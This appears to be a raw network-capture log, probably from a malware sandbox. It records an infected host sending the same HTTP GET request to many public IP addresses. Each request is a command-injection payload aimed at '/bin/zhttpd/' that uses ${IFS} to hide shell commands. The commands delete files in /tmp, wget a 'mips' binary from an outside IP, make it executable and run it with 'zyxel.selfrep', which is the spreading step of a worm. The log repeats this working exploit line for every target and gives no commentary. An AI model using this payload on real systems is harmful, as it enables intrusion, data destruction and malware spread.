                                        Mar 31, 2024 09:21:13.817327976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4202192.168.2.2335986190.105.172.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817361116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4203192.168.2.235126442.87.159.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817406893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4204192.168.2.2349738157.41.180.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817454100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4205192.168.2.233302641.169.42.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817481995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4206192.168.2.2354266158.251.152.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817542076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4207192.168.2.2360502200.88.62.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817589998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4208192.168.2.2337976138.9.12.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817641973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4209192.168.2.235755679.13.203.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817694902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4210192.168.2.2360600114.15.99.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817753077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4211192.168.2.2340584182.58.255.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817804098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4212192.168.2.2335590197.195.220.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817862988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4213192.168.2.2341238113.52.72.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817898989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4214192.168.2.233779295.52.219.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.817940950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4215192.168.2.235939037.105.41.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818008900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4216192.168.2.235460073.197.101.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818043947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4217192.168.2.2334596133.218.8.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818064928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4218192.168.2.234564699.74.143.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818104982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4219192.168.2.2340338140.25.102.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818151951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4220192.168.2.235396089.237.248.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818202972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4221192.168.2.2342184153.188.248.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818247080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4222192.168.2.234394091.53.84.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818283081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4223192.168.2.234894690.91.157.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818334103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4224192.168.2.234579861.43.244.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818384886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4225192.168.2.236053249.123.179.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818440914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4226192.168.2.2349154159.23.69.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818486929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4227192.168.2.234396645.151.63.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818533897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4228192.168.2.234687672.161.216.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818607092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4229192.168.2.2357198212.194.218.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818646908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4230192.168.2.2360348160.252.164.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818691969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4231192.168.2.2343120126.110.201.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818733931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4232192.168.2.2338808155.186.133.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818788052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4233192.168.2.2342428123.59.232.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818847895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4234192.168.2.233880061.152.232.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818917036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4235192.168.2.234228879.81.27.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.818958998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4236192.168.2.233974262.177.102.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819009066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4237192.168.2.2348076108.120.103.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819057941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4238192.168.2.234606220.185.146.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819113016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4239192.168.2.2360948192.101.173.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819164038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4240192.168.2.236073067.9.143.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819204092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4241192.168.2.23545621.7.229.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819257975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4242192.168.2.234035658.30.96.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819313049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4243192.168.2.235994257.205.47.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819375992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4244192.168.2.2350526138.108.148.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819437981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4245192.168.2.23327725.111.69.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819494963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4246192.168.2.2360688212.88.83.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819550991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4247192.168.2.2351424141.173.105.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819606066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4248192.168.2.2338568170.151.54.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819658995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4249192.168.2.2340580156.255.17.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819706917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4250192.168.2.2338982117.12.128.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819749117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4251192.168.2.235152047.29.164.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819830894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4252192.168.2.235141031.192.125.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819891930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4253192.168.2.2355522165.202.129.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819926023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4254192.168.2.2337818202.151.208.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.819956064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4255192.168.2.233337687.66.224.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820000887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4256192.168.2.236087668.49.208.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820065022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4257192.168.2.2340724217.88.159.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820095062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4258192.168.2.2338370152.173.20.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820153952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4259192.168.2.234465445.148.42.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820214033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4260192.168.2.235020882.179.72.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820269108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4261192.168.2.233356242.18.121.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820322037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4262192.168.2.2333902192.119.5.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820355892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4263192.168.2.236099480.161.57.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820389986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4264192.168.2.236026280.118.179.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820451975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4265192.168.2.2334960155.76.3.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820491076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4266192.168.2.235517688.129.202.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820538044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4267192.168.2.2345532135.229.119.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820601940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4268192.168.2.2341466181.16.154.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820672035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4269192.168.2.233809213.205.144.118443
                                        TimestampBytes transferredDirectionData
